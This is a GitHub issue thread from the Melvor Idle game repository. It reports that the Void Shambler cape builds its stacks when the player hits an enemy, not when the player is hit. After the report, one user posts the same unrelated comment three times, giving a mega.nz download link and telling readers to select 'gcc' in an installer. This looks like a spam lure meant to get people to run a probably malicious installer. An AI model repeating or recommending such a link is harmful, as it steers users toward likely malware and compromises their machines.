### ISSUE TITLE
[Bug]: Void Shambler cape is applying its stacks when hitting an enemy

### ISSUE THREAD

**Issue by Flurryous** [MelvorIdle/melvoridle.github.io#4596]
### Describe the bug

Void Shambler cape's description mentions that it applies its abyssal resistance stacks when you are hit, but they are only applying when you hit the enemy. 

### Reproduction Steps

1. Equip Void Shambler cape
2. Attack a monster
3. Check to see that the Void Shambler cape's buff starts stacking up.

### Expected behaviour

Void Shambler cape should apply its stacks when you are hit, as the description says, and not when you hit an enemy. 

### Which platforms are you experiencing this bug on?

- [ ] Chrome
- [ ] Firefox
- [ ] Edge
- [ ] Safari
- [X] Steam
- [ ] Epic Games
- [ ] Mobile App (iOS)
- [ ] Mobile App (Android)
- [ ] Mobile App (Android Beta)
- [ ] Other (Please Specify)

### Which expansions are purchased and active at the time of the bug?

- [X] Throne of the Herald
- [X] Atlas of Discovery
- [X] Into the Abyss

### Which version of the game are you experiencing this bug on?

v1.3

### Game Subversion

?11753

### Are you using any mods?

Yes

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
